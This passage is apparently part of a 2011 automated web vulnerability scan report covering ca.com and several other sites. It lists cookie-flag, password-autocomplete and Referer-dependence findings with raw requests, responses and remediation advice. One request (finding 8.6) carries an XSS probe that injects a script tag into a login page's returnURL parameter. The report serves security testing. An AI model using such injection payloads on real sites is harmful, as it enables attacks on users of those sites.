HTTP/1.1 302 Object Moved=33554433&REALMOID=06-1b8e166c-7b99-4dde-8e8e-3d72b8676926&GUID=0&SMAUTHREASON=0&METHOD=GET&SMAGENTNAME=-SM-ceh3eHBrhdBGtkDbzVMc19jsrO5glB4Pb5vXNZLDdm9J8L7U83j3tj9%2bMS6GITKt&TARGET=-SM-https%3a%2f%2fwww%2eca%2ecom%2fregister%2fssoauthenticate%2easpx%3fCATARGET%3dLVNNLUhUVFBTOi8vY29tbXVuaXRpZXMuY2EuY29tL2MvcG9ydGFsL2xvZ2luP3BfbF9pZD0xMDE0MQ%3d%3dset-cookie: target=https%3a//www.ca.com/register/ssoauthenticate.aspx%3fCATARGET=LVNNLUhUVFBTOi8vY29tbXVuaXRpZXMuY2EuY29tL2MvcG9ydGFsL2xvZ2luP3BfbF9pZD0xMDE0MQ==; path=/; domain=.ca.com
7.16. https://www.ca.com/us/register/login.aspx
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://www.ca.com
Path:
/us/register/login.aspx
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:SMTRYNO=false; domain=ca.com; expires=Tue, 06-Sep-2011 18:23:42 GMT; path=/
Request
GET /us/register/login.aspx?TYPE=33554433&REALMOID=06-87393857-93f3-4215-801a-7f71d6dfdcde&GUID=&SMAUTHREASON=0&METHOD=GET&SMAGENTNAME=rs-prod-communities-wa&TARGET=-SM-HTTPS%3a%2f%2fcommunities%2eca%2ecom%2fc%2fportal%2flogin%3fp_l_id%3d10141 HTTP/1.1/default.aspx/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.3=lu35kz45ihmhlw45uko5w4y3; __utmz=119010075.1315351389.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=119010075.704641068069632400.1315351389.1315351389.1315351389.1; __utmc=119010075; __utmb=119010075.1.10.1315351389; bn_u=6923713924586392201; WT_FPC=id=50.23.123.106-69753008.30174402:lv=1315351414553:ss=1315351389192; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.ca.com%2Fus%2Fdefault.aspx%22%2C%22r%22%3A%22%22%2C%22t%22%3A1315351414659%2C%22u%22%3A%226923713924586392201%22%2C%22at%22%3A%7B%22docAttrs%22%3A%22%7B%5C%22Locale%5C%22%3A%5C%22en%5C%22%2C%5C%22Product%5C%22%3Anull%2C%5C%22Description%5C%22%3A%5C%22CA%20Technologies%20offers%20it%20management%20software%20and%20solutions%20for%20all%20of%20your%20business%20needs.%5C%22%7D%22%7D%2C%22dd%22%3A%22http%3A%2F%2Fcainternetsecurity.net%2FSupport%2FDefault.aspx%3Flang%3Den-US%22%2C%22l%22%3A%22Home%20and%20Home%20Office%22%2C%22de%22%3A%7B%22ti%22%3A%22CA%20Technologies%20IT%20Management%20Software%20and%20Solutions%22%2C%22nw%22%3A252%2C%22nl%22%3A136%7D%7D
Response
HTTP/1.1 200 OKSet-Cookie: SMTRYNO=false; domain=ca.com; expires=Tue, 06-Sep-2011 18:23:42 GMT; path=/ /xhtml1/DTD/xhtml1-transitional.dtd">/1999/xhtml">...[SNIP]...
8. Password field with autocomplete enabled
previous
next
There are 9 instances of this issue:
Issue background
Most browsers have a facility to remember user credentials that are entered into HTML forms. This function can be configured by the user and also by applications which employ user credentials. If the function is enabled, then credentials entered by the user are stored on their local computer and retrieved by the browser on future visits to the same application.
Issue remediation
To prevent browsers from storing credentials entered into HTML forms, you should include the attribute autocomplete="off" within the FORM tag (to protect all form fields) or within the relevant INPUT tags (to protect specific individual fields).
8.1. http://webconnect.sendouts.com/login.aspx
previous
next
Summary
Severity:
Low
Confidence:
Certain
Host:
http://webconnect.sendouts.com
Path:
/login.aspx
Issue detail
The page contains a form with the following action URL:http://webconnect.sendouts.com/login.aspx?ReturnUrl=%2fcandidate%2fmy-profile.aspx%3fID%3dcfs%26SiteID%3dWebConnect%26Group%3dcfs%26Key%3dCN%26CnId%3d&ID=cfs&SiteID=WebConnect&Group=cfs&Key=CN&CnId=
Request
GET /login.aspx?ReturnUrl=%2fcandidate%2fmy-profile.aspx%3fID%3dcfs%26SiteID%3dWebConnect%26Group%3dcfs%26Key%3dCN%26CnId%3d&ID=cfs&SiteID=WebConnect&Group=cfs&Key=CN&CnId= HTTP/1.1.sendouts.com/CN_main.aspx?key=cn&id=cfs/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.3=2zmfb345apwujmfqifpo5b55
Response
HTTP/1.1 200 OK/xhtml1/DTD/xhtml1-transitional.dtd">/1999/xhtml">...[SNIP]... <form name="WebForm1" method="post" action="login.aspx?ReturnUrl=%2fcandidate%2fmy-profile.aspx%3fID%3dcfs%26SiteID%3dWebConnect%26Group%3dcfs%26Key%3dCN%26CnId%3d&ID=cfs&SiteID=WebConnect&Group=cfs&Key=CN&CnId=" onsubmit="javascript:return WebForm_OnSubmit();" id="WebForm1"> ...[SNIP]... <input name="txtPassword" type="password" id="txtPassword" /> <span id="RequiredFieldValidator2" class="ErrorMsg" style="color:Red;display:none;">...[SNIP]...
8.2. https://www.ca.com/us/register/createprofile.aspx
previous
next
Summary
Severity:
Low
Confidence:
Certain
Host:
https://www.ca.com
Path:
/us/register/createprofile.aspx
Issue detail
The page contains a form with the following action URL:https://www.ca.com/us/register/createprofile.aspx?returnURL=/us/default.aspx
Request
GET /us/register/createprofile.aspx?returnURL=/us/default.aspx HTTP/1.1/default.aspx/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.3=lu35kz45ihmhlw45uko5w4y3; __utmz=119010075.1315351389.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=119010075.704641068069632400.1315351389.1315351389.1315351389.1; __utmc=119010075; __utmb=119010075.1.10.1315351389; bn_u=6923713924586392201; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.ca.com%2Fus%2Fdefault.aspx%22%2C%22r%22%3A%22%22%2C%22t%22%3A1315351414659%2C%22u%22%3A%226923713924586392201%22%2C%22at%22%3A%7B%22docAttrs%22%3A%22%7B%5C%22Locale%5C%22%3A%5C%22en%5C%22%2C%5C%22Product%5C%22%3Anull%2C%5C%22Description%5C%22%3A%5C%22CA%20Technologies%20offers%20it%20management%20software%20and%20solutions%20for%20all%20of%20your%20business%20needs.%5C%22%7D%22%7D%2C%22dd%22%3A%22http%3A%2F%2Fcainternetsecurity.net%2FSupport%2FDefault.aspx%3Flang%3Den-US%22%2C%22l%22%3A%22Home%20and%20Home%20Office%22%2C%22de%22%3A%7B%22ti%22%3A%22CA%20Technologies%20IT%20Management%20Software%20and%20Solutions%22%2C%22nw%22%3A252%2C%22nl%22%3A136%7D%7D; WT_FPC=id=50.23.123.106-69753008.30174402:lv=1315351461237:ss=1315351389192
Response
HTTP/1.1 200 OK/xhtml1/DTD/xhtml1-transitional.dtd">/1999/xhtml">...[SNIP]... <form name="mainForm" method="post" action="/us/register/createprofile.aspx?returnURL=/us/default.aspx" onsubmit="javascript:return WebForm_OnSubmit();" id="mainForm"> ...[SNIP]... <input name="txtPsw" type="password" id="txtPsw" maxlength="32" class="small formfieldwidth2 hastip" /> ...[SNIP]... <input name="txtPswConf" type="password" id="txtPswConf" maxlength="32" class="small formfieldwidth2 hastip" /> ...[SNIP]...
8.3. https://www.ca.com/us/register/login.aspx
previous
next
Summary
Severity:
Low
Confidence:
Certain
Host:
https://www.ca.com
Path:
/us/register/login.aspx
Issue detail
The page contains a form with the following action URL:https://www.ca.com/us/register/login.aspx?returnURL=/us/default.aspx
Request
GET /us/register/login.aspx?returnURL=/us/default.aspx HTTP/1.1/default.aspx/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.3=lu35kz45ihmhlw45uko5w4y3; __utmz=119010075.1315351389.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=119010075.704641068069632400.1315351389.1315351389.1315351389.1; __utmc=119010075; __utmb=119010075.1.10.1315351389; WT_FPC=id=50.23.123.106-69753008.30174402:lv=1315351389192:ss=1315351389192; bn_u=6923713924586392201
Response
HTTP/1.1 200 OK/xhtml1/DTD/xhtml1-transitional.dtd">/1999/xhtml">...[SNIP]... <form name="mainForm" method="post" action="/us/register/login.aspx?returnURL=/us/default.aspx" onsubmit="javascript:return WebForm_OnSubmit();" id="mainForm"> ...[SNIP]... <input name="PASSWORD" type="password" id="PASSWORD" class="small hastip formfieldwidth2" /> ...[SNIP]...
8.4. https://www.ca.com/us/register/login.aspx
previous
next
Summary
Severity:
Low
Confidence:
Certain
Host:
https://www.ca.com
Path:
/us/register/login.aspx
Issue detail
The page contains a form with the following action URL:https://www.ca.com/us/register/login.aspx?TYPE=33554433&REALMOID=06-87393857-93f3-4215-801a-7f71d6dfdcde&GUID=&SMAUTHREASON=0&METHOD=GET&SMAGENTNAME=rs-prod-communities-wa&TARGET=-SM-HTTPS%3a%2f%2fcommunities%2eca%2ecom%2fc%2fportal%2flogin%3fp_l_id%3d10141
Request
GET /us/register/login.aspx?TYPE=33554433&REALMOID=06-87393857-93f3-4215-801a-7f71d6dfdcde&GUID=&SMAUTHREASON=0&METHOD=GET&SMAGENTNAME=rs-prod-communities-wa&TARGET=-SM-HTTPS%3a%2f%2fcommunities%2eca%2ecom%2fc%2fportal%2flogin%3fp_l_id%3d10141 HTTP/1.1/default.aspx/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.3=lu35kz45ihmhlw45uko5w4y3; __utmz=119010075.1315351389.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=119010075.704641068069632400.1315351389.1315351389.1315351389.1; __utmc=119010075; __utmb=119010075.1.10.1315351389; bn_u=6923713924586392201; WT_FPC=id=50.23.123.106-69753008.30174402:lv=1315351414553:ss=1315351389192; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.ca.com%2Fus%2Fdefault.aspx%22%2C%22r%22%3A%22%22%2C%22t%22%3A1315351414659%2C%22u%22%3A%226923713924586392201%22%2C%22at%22%3A%7B%22docAttrs%22%3A%22%7B%5C%22Locale%5C%22%3A%5C%22en%5C%22%2C%5C%22Product%5C%22%3Anull%2C%5C%22Description%5C%22%3A%5C%22CA%20Technologies%20offers%20it%20management%20software%20and%20solutions%20for%20all%20of%20your%20business%20needs.%5C%22%7D%22%7D%2C%22dd%22%3A%22http%3A%2F%2Fcainternetsecurity.net%2FSupport%2FDefault.aspx%3Flang%3Den-US%22%2C%22l%22%3A%22Home%20and%20Home%20Office%22%2C%22de%22%3A%7B%22ti%22%3A%22CA%20Technologies%20IT%20Management%20Software%20and%20Solutions%22%2C%22nw%22%3A252%2C%22nl%22%3A136%7D%7D
Response
HTTP/1.1 200 OK/xhtml1/DTD/xhtml1-transitional.dtd">/1999/xhtml">...[SNIP]... <form name="mainForm" method="post" action="/us/register/login.aspx?TYPE=33554433&REALMOID=06-87393857-93f3-4215-801a-7f71d6dfdcde&GUID=&SMAUTHREASON=0&METHOD=GET&SMAGENTNAME=rs-prod-communities-wa&TARGET=-SM-HTTPS%3a%2f%2fcommunities%2eca%2ecom%2fc%2fportal%2flogin%3fp_l_id%3d10141" onsubmit="javascript:return WebForm_OnSubmit();" id="mainForm"> ...[SNIP]... <input name="PASSWORD" type="password" id="PASSWORD" class="small hastip formfieldwidth2" /> ...[SNIP]...
8.5. https://www.ca.com/us/register/login.aspx
previous
next
Summary
Severity:
Low
Confidence:
Certain
Host:
https://www.ca.com
Path:
/us/register/login.aspx
Issue detail
The page contains a form with the following action URL:https://www.ca.com/us/register/login.aspx?TYPE=33554433&REALMOID=06-1b8e166c-7b99-4dde-8e8e-3d72b8676926&GUID=0&SMAUTHREASON=0&METHOD=GET&SMAGENTNAME=-SM-ceh3eHBrhdBGtkDbzVMc19jsrO5glB4Pb5vXNZLDdm9J8L7U83j3tj9%2bMS6GITKt&TARGET=-SM-https%3a%2f%2fwww%2eca%2ecom%2fregister%2fssoauthenticate%2easpx%3freturnURL%3dL3VzL2RlZmF1bHQuYXNweA%3d%3d
Request
GET /us/register/login.aspx?TYPE=33554433&REALMOID=06-1b8e166c-7b99-4dde-8e8e-3d72b8676926&GUID=0&SMAUTHREASON=0&METHOD=GET&SMAGENTNAME=-SM-ceh3eHBrhdBGtkDbzVMc19jsrO5glB4Pb5vXNZLDdm9J8L7U83j3tj9%2bMS6GITKt&TARGET=-SM-https%3a%2f%2fwww%2eca%2ecom%2fregister%2fssoauthenticate%2easpx%3freturnURL%3dL3VzL2RlZmF1bHQuYXNweA%3d%3d HTTP/1.1/register/login.aspx?returnURL=/us/default.aspx/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.3=lu35kz45ihmhlw45uko5w4y3; __utmz=119010075.1315351389.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=119010075.704641068069632400.1315351389.1315351389.1315351389.1; __utmc=119010075; __utmb=119010075.1.10.1315351389; bn_u=6923713924586392201; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.ca.com%2Fus%2Fdefault.aspx%22%2C%22r%22%3A%22%22%2C%22t%22%3A1315351414659%2C%22u%22%3A%226923713924586392201%22%2C%22at%22%3A%7B%22docAttrs%22%3A%22%7B%5C%22Locale%5C%22%3A%5C%22en%5C%22%2C%5C%22Product%5C%22%3Anull%2C%5C%22Description%5C%22%3A%5C%22CA%20Technologies%20offers%20it%20management%20software%20and%20solutions%20for%20all%20of%20your%20business%20needs.%5C%22%7D%22%7D%2C%22dd%22%3A%22http%3A%2F%2Fcainternetsecurity.net%2FSupport%2FDefault.aspx%3Flang%3Den-US%22%2C%22l%22%3A%22Home%20and%20Home%20Office%22%2C%22de%22%3A%7B%22ti%22%3A%22CA%20Technologies%20IT%20Management%20Software%20and%20Solutions%22%2C%22nw%22%3A252%2C%22nl%22%3A136%7D%7D; WT_FPC=id=50.23.123.106-69753008.30174402:lv=1315351628610:ss=1315351389192; target=https%3a//www.ca.com/register/ssoauthenticate.aspx%3freturnURL=L3VzL2RlZmF1bHQuYXNweA==; SMTRYNO=1
Response
HTTP/1.1 200 OK/xhtml1/DTD/xhtml1-transitional.dtd">/1999/xhtml">...[SNIP]... <form name="mainForm" method="post" action="/us/register/login.aspx?TYPE=33554433&REALMOID=06-1b8e166c-7b99-4dde-8e8e-3d72b8676926&GUID=0&SMAUTHREASON=0&METHOD=GET&SMAGENTNAME=-SM-ceh3eHBrhdBGtkDbzVMc19jsrO5glB4Pb5vXNZLDdm9J8L7U83j3tj9%2bMS6GITKt&TARGET=-SM-https%3a%2f%2fwww%2eca%2ecom%2fregister%2fssoauthenticate%2easpx%3freturnURL%3dL3VzL2RlZmF1bHQuYXNweA%3d%3d" onsubmit="javascript:return WebForm_OnSubmit();" id="mainForm"> ...[SNIP]... <input name="PASSWORD" type="password" id="PASSWORD" class="small hastip formfieldwidth2" /> ...[SNIP]...
8.6. https://www.ca.com/us/register/login.aspx
previous
next
Summary
Severity:
Low
Confidence:
Certain
Host:
https://www.ca.com
Path:
/us/register/login.aspx
Issue detail
The page contains a form with the following action URL:https://www.ca.com/us/register/login.aspx?returnURL=/us/default.aspx%22%3E%3Cscript%3Eprompt(document.location)%3C/script%3Exss
Request
GET /us/register/login.aspx?returnURL=/us/default.aspx%22%3E%3Cscript%3Eprompt(document.location)%3C/script%3Exss HTTP/1.1/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.75ef580ca31315351916776:lv=1315351916776:ss=1315351916776
Response
HTTP/1.1 200 OK/xhtml1/DTD/xhtml1-transitional.dtd">/1999/xhtml">...[SNIP]... <form name="mainForm" method="post" action="/us/register/login.aspx?returnURL=/us/default.aspx%22%3E%3Cscript%3Eprompt(document.location)%3C/script%3Exss" onsubmit="javascript:return WebForm_OnSubmit();" id="mainForm"> ...[SNIP]... <input name="PASSWORD" type="password" id="PASSWORD" class="small hastip formfieldwidth2" /> ...[SNIP]...
8.7. https://www.ca.com/us/register/login.aspx
previous
next
Summary
Severity:
Low
Confidence:
Certain
Host:
https://www.ca.com
Path:
/us/register/login.aspx
Issue detail
The page contains a form with the following action URL:https://www.ca.com/us/register/login.aspx?TYPE=33554433&REALMOID=06-1b8e166c-7b99-4dde-8e8e-3d72b8676926&GUID=0&SMAUTHREASON=0&METHOD=GET&SMAGENTNAME=-SM-ceh3eHBrhdBGtkDbzVMc19jsrO5glB4Pb5vXNZLDdm9J8L7U83j3tj9%2bMS6GITKt&TARGET=-SM-https%3a%2f%2fwww%2eca%2ecom%2fregister%2fssoauthenticate%2easpx%3fCATARGET%3dLVNNLUhUVFBTOi8vY29tbXVuaXRpZXMuY2EuY29tL2MvcG9ydGFsL2xvZ2luP3BfbF9pZD0xMDE0MQ%3d%3d
Request
GET /us/register/login.aspx?TYPE=33554433&REALMOID=06-1b8e166c-7b99-4dde-8e8e-3d72b8676926&GUID=0&SMAUTHREASON=0&METHOD=GET&SMAGENTNAME=-SM-ceh3eHBrhdBGtkDbzVMc19jsrO5glB4Pb5vXNZLDdm9J8L7U83j3tj9%2bMS6GITKt&TARGET=-SM-https%3a%2f%2fwww%2eca%2ecom%2fregister%2fssoauthenticate%2easpx%3fCATARGET%3dLVNNLUhUVFBTOi8vY29tbXVuaXRpZXMuY2EuY29tL2MvcG9ydGFsL2xvZ2luP3BfbF9pZD0xMDE0MQ%3d%3d HTTP/1.1/register/login.aspx?TYPE=33554433&REALMOID=06-87393857-93f3-4215-801a-7f71d6dfdcde&GUID=&SMAUTHREASON=0&METHOD=GET&SMAGENTNAME=rs-prod-communities-wa&TARGET=-SM-HTTPS%3a%2f%2fcommunities%2eca%2ecom%2fc%2fportal%2flogin%3fp_l_id%3d10141/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.3=lu35kz45ihmhlw45uko5w4y3; __utmz=119010075.1315351389.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=119010075.704641068069632400.1315351389.1315351389.1315351389.1; __utmc=119010075; __utmb=119010075.1.10.1315351389; bn_u=6923713924586392201; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.ca.com%2Fus%2Fdefault.aspx%22%2C%22r%22%3A%22%22%2C%22t%22%3A1315351414659%2C%22u%22%3A%226923713924586392201%22%2C%22at%22%3A%7B%22docAttrs%22%3A%22%7B%5C%22Locale%5C%22%3A%5C%22en%5C%22%2C%5C%22Product%5C%22%3Anull%2C%5C%22Description%5C%22%3A%5C%22CA%20Technologies%20offers%20it%20management%20software%20and%20solutions%20for%20all%20of%20your%20business%20needs.%5C%22%7D%22%7D%2C%22dd%22%3A%22http%3A%2F%2Fcainternetsecurity.net%2FSupport%2FDefault.aspx%3Flang%3Den-US%22%2C%22l%22%3A%22Home%20and%20Home%20Office%22%2C%22de%22%3A%7B%22ti%22%3A%22CA%20Technologies%20IT%20Management%20Software%20and%20Solutions%22%2C%22nw%22%3A252%2C%22nl%22%3A136%7D%7D; WT_FPC=id=50.23.123.106-69753008.30174402:lv=1315351598983:ss=1315351389192; target=https%3a//www.ca.com/register/ssoauthenticate.aspx%3fCATARGET=LVNNLUhUVFBTOi8vY29tbXVuaXRpZXMuY2EuY29tL2MvcG9ydGFsL2xvZ2luP3BfbF9pZD0xMDE0MQ==; SMTRYNO=1
Response
HTTP/1.1 200 OK/xhtml1/DTD/xhtml1-transitional.dtd">/1999/xhtml">...[SNIP]... <form name="mainForm" method="post" action="/us/register/login.aspx?TYPE=33554433&REALMOID=06-1b8e166c-7b99-4dde-8e8e-3d72b8676926&GUID=0&SMAUTHREASON=0&METHOD=GET&SMAGENTNAME=-SM-ceh3eHBrhdBGtkDbzVMc19jsrO5glB4Pb5vXNZLDdm9J8L7U83j3tj9%2bMS6GITKt&TARGET=-SM-https%3a%2f%2fwww%2eca%2ecom%2fregister%2fssoauthenticate%2easpx%3fCATARGET%3dLVNNLUhUVFBTOi8vY29tbXVuaXRpZXMuY2EuY29tL2MvcG9ydGFsL2xvZ2luP3BfbF9pZD0xMDE0MQ%3d%3d" onsubmit="javascript:return WebForm_OnSubmit();" id="mainForm"> ...[SNIP]... <input name="PASSWORD" type="password" id="PASSWORD" class="small hastip formfieldwidth2" /> ...[SNIP]...
8.8. http://www.javalobby.org/articles/acegisecurity/part1.jsp
previous
next
Summary
Severity:
Low
Confidence:
Certain
Host:
http://www.javalobby.org
Path:
/articles/acegisecurity/part1.jsp
Issue detail
The page contains a form with the following action URL:http://www.javalobby.org/forums/login.jspa
Request
GET /articles/acegisecurity/part1.jsp HTTP/1.1/search?sourceid=chrome&ie=UTF-8&q=acegisecurity/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.3
Response
HTTP/1.1 200 OK...[SNIP]... <form action="/forums/login.jspa" method="post" name="loginform"> <input type="password" name="password" size="20" maxlength="150" value="" tabindex="2" id="password01" /> ...[SNIP]...
8.9. http://www.javaworld.com/javaworld/jw-10-2007/jw-10-acegi2.html
previous
next
Summary
Severity:
Low
Confidence:
Certain
Host:
http://www.javaworld.com
Path:
/javaworld/jw-10-2007/jw-10-acegi2.html
Issue detail
The page contains a form with the following action URL:http://www.javaworld.com/javaworld/jw-10-2007/jw-10-acegi2.html
Request
GET /javaworld/jw-10-2007/jw-10-acegi2.html HTTP/1.1/search?sourceid=chrome&ie=UTF-8&q=acegisecurity/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.3
Response
HTTP/1.1 200 OK/xhtml1/DTD/xhtml1-transitional.dtd">...[SNIP]... _login08.php"><form id="form_login"> ...[SNIP]... <input name="upass" type="password" id="jq_password" class="inputtext" /> ...[SNIP]...
9. Referer-dependent response
previous
next
There are 3 instances of this issue:
Issue description
The application's responses appear to depend systematically on the presence or absence of the Referer header in requests. This behaviour does not necessarily constitute a security vulnerability, and you should investigate the nature of and reason for the differential responses to determine whether a vulnerability is present.Referer-based access controls, where the application assumes that if you have arrived from one privileged location then you are authorised to access another privileged location. These controls can be trivially defeated by supplying an accepted Referer header in requests for the vulnerable function. Attempts to prevent cross-site request forgery attacks by verifying that requests to perform privileged actions originated from within the application itself and not from some external location. Such defences are not robust - methods have existed through which an attacker can forge or mask the Referer header contained within a target user's requests, by leveraging client-side technologies such as Flash and other techniques. Delivery of Referer-tailored content, such as welcome messages to visitors from specific domains, search-engine optimisation (SEO) techniques, and other ways of tailoring the user's experience. Such behaviours often have no security impact; however, unsafe processing of the Referer header may introduce vulnerabilities such as SQL injection and cross-site scripting. If parts of the document (such as META keywords) are updated based on search engine queries contained in the Referer header, then the application may be vulnerable to persistent code injection attacks, in which search terms are manipulated to cause malicious content to appear in responses served to other application users.
Issue remediation
The Referer header is not a robust foundation on which to build any security measures, such as access controls or defences against cross-site request forgery. Any such measures should be replaced with more secure alternatives that are not vulnerable to Referer spoofing.
9.1. http://www.javaworld.com/javaworld/jw-10-2007/jw-10-acegi2.html
previous
next
Summary
Severity:
Information
Confidence:
Firm
Host:
http://www.javaworld.com
Path:
/javaworld/jw-10-2007/jw-10-acegi2.html
Request 1
GET /javaworld/jw-10-2007/jw-10-acegi2.html HTTP/1.1Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=acegisecurity /xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.3
Response 1
HTTP/1.1 200 OK/xhtml1/DTD/xhtml1-transitional.dtd">...[SNIP]... http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=acegisecurity");-scripts.js"></script>.net/js/recaptcha_ajax.js"></script>-10-acegi2.html",-10-acegi2.html",; _hbEC++]=new Object();b._N=a;b._C=0;return b;}.vpc="HBX0103u";hbx.gn="a.javaworld.com";.href);;DM550210NGWB";+HERE";";...[SNIP]...
Request 2
GET /javaworld/jw-10-2007/jw-10-acegi2.html HTTP/1.1/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.3
Response 2
HTTP/1.1 200 OK/xhtml1/DTD/xhtml1-transitional.dtd">...[SNIP]... (none)");-scripts.js"></script>.net/js/recaptcha_ajax.js"></script>-10-acegi2.html",-10-acegi2.html",; _hbEC++]=new Object();b._N=a;b._C=0;return b;}.vpc="HBX0103u";hbx.gn="a.javaworld.com";.href);;DM550210NGWB";+HERE";";...[SNIP]...
9.2. http://www.viddler.com/embed/dca1712/
previous
next
Summary
Severity:
Information
Confidence:
Firm
Host:
http://www.viddler.com
Path:
/embed/dca1712/
Request 1
GET /embed/dca1712/?f=1&offset=0&autoplay=0&disablebranding=0 HTTP/1.1Referer: http://blog.proofpoint.com/ /xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.3
Response 1
HTTP/1.1 200 OK...[SNIP]... -shockwave-flash" allowScriptAccess="always" allowFullScreen="true" allowNetworking="all" id="viddler_dca1712" flashVars="f=1&autoplay=f&disablebranding=f&ref=http%3A%2F%2Fblog.proofpoint.com%2F&enablejsapi=t&enablecallbacks=t&playerapiid=viddler_dca1712f=1offset=0" wmode="direct"></embed>
Request 2
GET /embed/dca1712/?f=1&offset=0&autoplay=0&disablebranding=0 HTTP/1.1/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.3
Response 2
HTTP/1.1 200 OK...[SNIP]... -shockwave-flash" allowScriptAccess="always" allowFullScreen="true" allowNetworking="all" id="viddler_dca1712" flashVars="f=1&autoplay=f&disablebranding=f&ref=&enablejsapi=t&enablecallbacks=t&playerapiid=viddler_dca1712f=1offset=0" wmode="direct"></embed>
9.3. http://www.viddler.com/player/dca1712/0
previous
next
Summary
Severity:
Information
Confidence:
Firm
Host:
http://www.viddler.com
Path:
/player/dca1712/0
Request 1
GET /player/dca1712/0 HTTP/1.1Referer: http://www.viddler.com/embed/dca1712/?f=1&offset=0&autoplay=0&disablebranding=0 ;q=0.3E28BE1C2E55FB125CE85F54.viddler_a
Response 1
HTTP/1.1 302 Found/bigPlayerChooser.action?ref=www.viddler.com&key=dca1712&offsetTime=0.com/bigPlayerChooser.action?ref=www.viddler.com&key=dca1712&offsetTime=0">here</a>.</p>
Request 2
GET /player/dca1712/0 HTTP/1.1;q=0.3E28BE1C2E55FB125CE85F54.viddler_a
Response 2
HTTP/1.1 302 Found/bigPlayerChooser.action?ref=&key=dca1712&offsetTime=0.com/bigPlayerChooser.action?ref=&key=dca1712&offsetTime=0">here</a>.</p>
10. SSL cookie without secure flag set
previous
next
There are 3 instances of this issue:
Issue background
If the secure flag is set on a cookie, then browsers will not submit the cookie in any requests that use an unencrypted HTTP connection, thereby preventing the cookie from being trivially intercepted by an attacker monitoring network traffic. If the secure flag is not set, then the cookie will be transmitted in clear-text if the user visits any HTTP URLs within the cookie's scope. An attacker may be able to induce this event by feeding a user suitable links, either directly or via another web site. Even if the domain which issued the cookie does not host any content that is accessed over HTTP, an attacker may be able to use links of the form http://example.com:443/ to perform the same attack.
Issue remediation
The secure flag should be set on all cookies that are used for transmitting sensitive data when accessing content over HTTPS. If cookies are used to transmit session tokens, then areas of the application that are accessed over HTTPS should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications.
10.1. https://store.trendmicro.com/DRHM/Storefront/Library/scripts/DigitalRiverOTPageLevelCode.js
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://store.trendmicro.com
Path:
/DRHM/Storefront/Library/scripts/DigitalRiverOTPageLevelCode.js
Issue detail
The following cookie was issued by the application and does not have the secure flag set:BIGipServerp-drh-dc2pod9-pool1-active=1661075978.260.0000; path=/
Request
GET /DRHM/Storefront/Library/scripts/DigitalRiverOTPageLevelCode.js HTTP/1.1;q=0.7.com/store?Action=DisplayPage&Locale=en_US&SiteID=tmamer&id=ShoppingCartPage-1315351119372; bn_u=6923713920140458023; __utma=44797537.1048817980.1315351191.1315351191.1315351191.1; __utmz=44797537.1315351191.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; fsr.r={"d":90,"i":"1315351193052_377417","e":1315956018002}; __unam=e9c3bfd-132410b0872-607b674b-1; ORA_WX_SESSION=10.2.2.129:260-0#0; JSESSIONID=885803A57111A855BDA3F7D5608FCD0D; VISITOR_ID=971D4E8DFAED43672BD9EDEF2E7090049E8F29A9B6FF10E6
Response
HTTP/1.1 200 OK.1.2.0.2 (H;max-age=7200+0;age=2440;ecid=105660496814,0)Set-Cookie: BIGipServerp-drh-dc2pod9-pool1-active=1661075978.260.0000; path=/ :document,L:document.location,M:[],Q:{},T:new Date(),U:'',V:'2.7',Enabled:true,ST:"script",SA:},I:function(){var s=this.L.search;var c=this.D.cooki...[SNIP]...
10.2. https://www.ca.com/siteminderagent/forms/login.fcc
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://www.ca.com
Path:
/siteminderagent/forms/login.fcc
Issue detail
The following cookie was issued by the application and does not have the secure flag set:target=https%3a//www.ca.com/register/ssoauthenticate.aspx%3fCATARGET=LVNNLUhUVFBTOi8vY29tbXVuaXRpZXMuY2EuY29tL2MvcG9ydGFsL2xvZ2luP3BfbF9pZD0xMDE0MQ==; path=/; domain=.ca.com
Request
